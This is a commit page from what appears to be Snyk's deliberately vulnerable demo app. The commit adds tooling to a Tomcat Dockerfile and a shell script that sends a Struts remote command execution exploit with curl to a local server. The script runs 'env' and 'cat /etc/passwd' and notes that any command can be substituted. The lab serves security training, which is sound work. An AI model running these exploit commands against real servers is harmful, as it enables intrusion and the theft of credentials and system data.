added native2ascii to container and made exploits work

snyk-labs · Oct 20, 2021 · 23633bf · 23633bf
1 parent 389d793
commit 23633bf
Show file tree

Hide file tree

Showing 3 changed files with 6 additions and 0 deletions.
diff --git a/Dockerfile b/Dockerfile
@@ -10,3 +10,5 @@ FROM tomcat:8.5.21
 RUN mkdir /tmp/extracted_files
 COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
 COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.war
+COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
+COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar
diff --git a/exploits/struts-exploit-docker-tomcat.sh b/exploits/struts-exploit-docker-tomcat.sh
@@ -0,0 +1,4 @@
+# Struts exploit using curl and httpie (more colourful HTTP client)
+# (runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
+cat struts-exploit-headers.txt| sed "s/COMMAND/env/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H
+cat struts-exploit-headers.txt| sed "s/COMMAND/cat \/etc\/passwd/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H
diff --git a/exploits/zipslip-docker-tomcat.zip b/exploits/zipslip-docker-tomcat.zip